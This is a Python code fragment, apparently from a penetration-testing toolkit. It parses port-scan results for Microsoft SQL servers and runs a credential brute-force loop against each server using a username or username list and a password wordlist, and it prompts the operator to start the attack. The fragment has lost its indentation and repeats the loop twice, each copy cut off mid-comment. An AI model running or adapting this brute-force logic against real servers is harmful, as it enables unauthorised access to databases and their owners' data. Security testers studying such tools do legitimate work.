usernames = open(username, "r")
if sql_servers != False:
# get rid of extra data from port scanner
sql_servers = sql_servers.replace(":%s OPEN" % (port), "")
# split into tuple for different IP address
sql_servers = sql_servers.split(",")
# start loop and brute force
for servers in sql_servers:
# this will return the following format ipaddr + "," +
# username + "," + str(port) + "," + passwords
if servers != "":
# if we aren't using a username file
if not os.path.isfile(username):
sql_success = mssql.brute(
servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break
# into this to the above with a newline to
# be parsed later
master_list = master_list + \
sql_success + ":"
counter = 1
# if we specified a username list
if os.path.isfile(username):
for users in usernames:
users = users.rstrip()
sql_success = mssql.brute(
servers, users, port, wordlist)
# we wont break out of the loop here incase
print_status("The following SQL servers and associated ports were identified:\n")
for sql in sql_servers:
if sql != "":
print(sql)
if len(sql_servers) > 2:
print_status("By pressing enter, you will begin the brute force process on all SQL accounts identified in the list above.")
test = input("Press {enter} to begin the brute force process.")
for servers in sql_servers:
# this will return the following format ipaddr + "," +
# username + "," + str(port) + "," + passwords
if servers != "":
# if we aren't using a username file
if not os.path.isfile(username):
sql_success = mssql.brute(
servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break
# into this to the above with a newline to
# be parsed later
master_list = master_list + \
sql_success + ":"
counter = 1
# if we specified a username list
if os.path.isfile(username):
for users in usernames:
users = users.rstrip()
sql_success = mssql.brute(
servers, users, port, wordlist)
# we wont break out of the loop here incase
